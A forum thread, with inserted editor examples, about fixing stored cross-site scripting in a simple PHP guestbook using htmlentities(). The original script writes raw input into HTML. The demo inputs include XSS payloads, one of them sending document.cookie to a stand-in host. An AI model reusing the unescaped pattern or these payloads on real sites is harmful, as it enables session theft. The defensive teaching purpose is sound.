
Thread: disable HTML??

  1. #1 Shaun(OfTheDead) (Join Date: Nov 2005, Location: Trinidad)

    disable HTML??

    Hi there...

    I've gone through a tonne of these threads and haven't found what I'm looking for (although I'm sure this is a common question)...

    I have a guestbook on my site that consists of a form textarea and an inline frame which displays a file called 'comments.html' (which I guess is self-explanatory).

    When the user types stuff into the textarea and submits, a php page is called into the iframe which gets the stuff they typed, "appends" (for lack of a better word) it to the top of the 'comments.html' file, then re-opens the 'comments.html' into the iframe.

    (I hope I didn't make that sound too confusing)

    Anyway... It works fine, but it's a huge security risk because anyone (who knows what they're doing) can enter any HTML into the textarea, and it will go ahead and be rendered onto the page.

    So... is there a way to disable an HTML comment, while the PHP file is being parsed??

    Here is the PHP file (well... a simplified version)...


    <html>
    <head>
    <title>My Guestbook</title>
    <link rel="stylesheet" type="text/css" href="MyStyles.css" />
    </head>

    <body style="background-color:#ffffff">
    <?php
    // Raw form fields; stripslashes() undoes the magic_quotes_gpc escaping.
    // Nothing here neutralises markup, so whatever is typed is stored as HTML.
    $user=$_GET["username"];
    $user=stripslashes($user);
    $message=$_GET["message"];
    $message=stripslashes($message);
    print("<p class='txt'>Thank you!! Your comments have been added...<br />&nbsp;<a class='txt' href='GuestbookContent.html'>View your message</a>.</p>");

    // Read the existing entries so the new one can go in front of them.
    $in=fopen("GuestbookContent.html","rb");
    if(!$in){
    print("Could not load database :s");
    exit;
    }
    $contents = stream_get_contents($in);
    fclose($in);

    // Reopen for writing ("w" truncates), then write the new entry followed by the old contents.
    $out=fopen("GuestbookContent.html","w");
    if(!$out){
    print("Could not load database :s");
    exit;
    }

    fwrite($out,"\n<hr><p><b>$user</b> (");
    fwrite($out,date('d/m/Y'));
    fwrite($out,")");
    fwrite($out,"<br>$message</p>");
    fwrite($out,$contents);
    fclose($out);
    ?>
    </body>
    </html>

    Thanks!!

  2. #2 Rodney H. (Join Date: Sep 2005, Location: Chicago, IL)
    You can use htmlentities() or strip_tags() in this situation to do what you need.
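Added example (editor's code, not Rodney's or Shaun's): the two functions named above behave very differently on hostile input, and the difference is the whole point of the thread. The sample entries are constructed, and the `<b><i>` allow-list passed to strip_tags() is an illustrative choice.

```php
<?php
// Added example, not code from the thread: compare htmlentities() and
// strip_tags() on a few constructed guestbook entries.
// Run with: php escape_demo.php

// Constructed inputs, the kind of thing a hostile visitor types into the textarea.
$samples = [
    'plain'      => "Nice site! Greetings from <Trinidad>",
    'script'     => "<script>location='http://evil.example/?c='+document.cookie</script>",
    'event_attr' => "<b onmouseover=\"alert(1)\">hover me</b>",
    'broken_tag' => "<img src=x onerror=alert(1)",        // no closing '>' on purpose
    'quotes'     => "O'Neil said \"hi\" & left",
];

// Escape for an HTML body: <, >, &, " and ' become entities, so the browser
// shows the text instead of interpreting it. ENT_SUBSTITUTE keeps a stray
// invalid UTF-8 byte from making the whole string come back empty.
function escape_html(string $s): string {
    return htmlentities($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Strip tags but keep a small formatting allow-list (illustrative choice).
// strip_tags() does not touch attributes on allowed tags, so an event
// handler on <b> survives and still runs in the visitor's browser.
function strip_with_allowlist(string $s): string {
    return strip_tags($s, '<b><i>');
}

foreach ($samples as $name => $input) {
    printf("--- %s ---\n", $name);
    printf("input:        %s\n", $input);
    printf("htmlentities: %s\n", escape_html($input));
    printf("strip_tags:   %s\n", strip_with_allowlist($input));
}
```

Escaping is the right tool for a guestbook: the visitor's text is shown as text, nothing is lost, and the `event_attr` case shows why strip_tags() with any allow-list is not an XSS defence. htmlspecialchars() with the same flags does the same job for the five dangerous characters; htmlentities() additionally rewrites accented letters and other characters that have named entities, which is harmless but unnecessary.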

  3. #3 Shaun(OfTheDead) (Join Date: Nov 2005, Location: Trinidad)
    Jeeezus Christ!!... I leave this forum for 3 days and already I can't find my post!!...

    Anyways... The "htmlentities()" did the trick. Thanks a lot dude!!...
    Quite frankly whenever I check the manual for anything I get a nosebleed from the sheer confusion.

    The final product looks like this... (in case anyone wants to use my primitive guestbook)


    <html>
    <head>
    <title>My Guestbook</title>
    <link rel="stylesheet" type="text/css" href="MyStyles.css" />
    </head>

    <body style="background-color:#ffffff">
    <?php
    // Undo magic_quotes_gpc escaping, then turn any markup into entities
    // so the browser renders it as text instead of executing it.
    $user=$_GET["username"];
    $user=stripslashes($user);
    $user=htmlentities($user);
    $message=$_GET["message"];
    $message=stripslashes($message);
    $message=htmlentities($message);
    print("<p class='txt'>Thank you!! Your comments have been added...<br />&nbsp;<a class='txt' href='GuestbookContent.html'>View your message</a>.</p>");

    // Read the existing entries so the new one can go in front of them.
    $in=fopen("GuestbookContent.html","rb");
    if(!$in){
    print("Could not load database :s");
    exit;
    }
    $contents = stream_get_contents($in);
    fclose($in);

    // Reopen for writing ("w" truncates), then write the new entry followed by the old contents.
    $out=fopen("GuestbookContent.html","w");
    if(!$out){
    print("Could not load database :s");
    exit;
    }

    fwrite($out,"\n<hr><p><b>$user</b> (");
    fwrite($out,date('d/m/Y'));
    fwrite($out,")");
    fwrite($out,"<br>$message</p>");
    fwrite($out,$contents);
    fclose($out);
    ?>
    </body>
    </html>

    Thanks again, dude
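Added example (editor's code, not Shaun's final script): the same guestbook writer with the changes a reviewer would ask for today. Entries arrive by POST rather than GET, fields are length-capped and checked for valid UTF-8, htmlspecialchars() gets ENT_QUOTES and an explicit charset, nl2br() runs after escaping so line breaks survive while tags do not, and the read-then-overwrite sequence becomes one update under an exclusive lock so two simultaneous visitors cannot clobber each other's entry. stripslashes() is dropped because magic quotes were removed in PHP 5.4. The file name, the limits and the CLI demo input are assumptions; mbstring is assumed to be available.

```php
<?php
// Added example, not the thread's own code: a hardened guestbook writer.
// Assumes the same GuestbookContent.html layout as the posts above.
declare(strict_types=1);

const MAX_NAME_LEN    = 40;    // illustrative limits
const MAX_MESSAGE_LEN = 2000;

// Escape for insertion into an HTML body. ENT_QUOTES also covers the case
// where the value is later reused inside an attribute.
function esc(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Reject invalid UTF-8 and empty fields, then cap the length (mbstring assumed).
function clean_field(string $raw, int $max): string {
    if (!mb_check_encoding($raw, 'UTF-8')) {
        throw new InvalidArgumentException('input is not valid UTF-8');
    }
    $s = trim($raw);
    if ($s === '') {
        throw new InvalidArgumentException('field is empty');
    }
    return mb_substr($s, 0, $max, 'UTF-8');
}

// Prepend one entry to the guestbook file under an exclusive lock. The
// original read-then-fopen("w") sequence lets two concurrent requests read
// the same old contents, after which the second write drops the first entry.
function add_entry(string $file, string $user, string $message): void {
    $user    = clean_field($user, MAX_NAME_LEN);
    $message = clean_field($message, MAX_MESSAGE_LEN);

    // nl2br() after escaping: line breaks survive, visitor-supplied tags do not.
    $entry = sprintf("<hr><p><b>%s</b> (%s)<br>%s</p>\n",
        esc($user), date('d/m/Y'), nl2br(esc($message)));

    $fh = fopen($file, 'c+');   // create if missing, never truncate on open
    if ($fh === false) {
        throw new RuntimeException("cannot open $file");
    }
    try {
        if (!flock($fh, LOCK_EX)) {
            throw new RuntimeException("cannot lock $file");
        }
        $old = stream_get_contents($fh);
        ftruncate($fh, 0);
        rewind($fh);
        fwrite($fh, $entry . $old);
        fflush($fh);
        flock($fh, LOCK_UN);
    } finally {
        fclose($fh);
    }
}

// Read one POST field as a string; array values (username[]=x) are rejected.
function post_field(string $name): string {
    $v = $_POST[$name] ?? '';
    return is_string($v) ? $v : '';
}

// Web entry point: POST only, so a plain link or <img> cannot create an entry
// (a CSRF token would be the next step; it is out of scope here).
if (PHP_SAPI !== 'cli') {
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        http_response_code(405);
        exit;
    }
    try {
        add_entry(__DIR__ . '/GuestbookContent.html',
                  post_field('username'), post_field('message'));
        echo '<p class="txt">Thank you!! Your comments have been added... '
           . '<a class="txt" href="GuestbookContent.html">View your message</a>.</p>';
    } catch (InvalidArgumentException $e) {
        http_response_code(400);
        echo '<p class="txt">Bad input: ' . esc($e->getMessage()) . '</p>';
    }
    exit;
}

// CLI demo with constructed input: the script tag lands in the file as text.
$tmp = tempnam(sys_get_temp_dir(), 'gb');
add_entry($tmp, 'Shaun', "Hello from\nTrinidad");
add_entry($tmp, '<script>alert(1)</script>', '<img src=x onerror=alert(1)>');
echo file_get_contents($tmp);
unlink($tmp);
```

Run it as `php guestbook.php` to see the demo: the second entry's name is stored as `&lt;script&gt;alert(1)&lt;/script&gt;`, which the iframe then displays literally. The static GuestbookContent.html is still served as HTML, so the escaping at write time is the only thing standing between a visitor's input and every later reader's browser; that is why it has to happen on every field, every time.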

  4. #4 Rodney H. (Join Date: Sep 2005, Location: Chicago, IL)
    Quote Originally Posted by Shaun(OfTheDead)
    Quite frankly whenever I check the manual for anything I get a nosebleed from the sheer confusion.
    It is definitely an acquired taste, I will grant you that, Shaun...

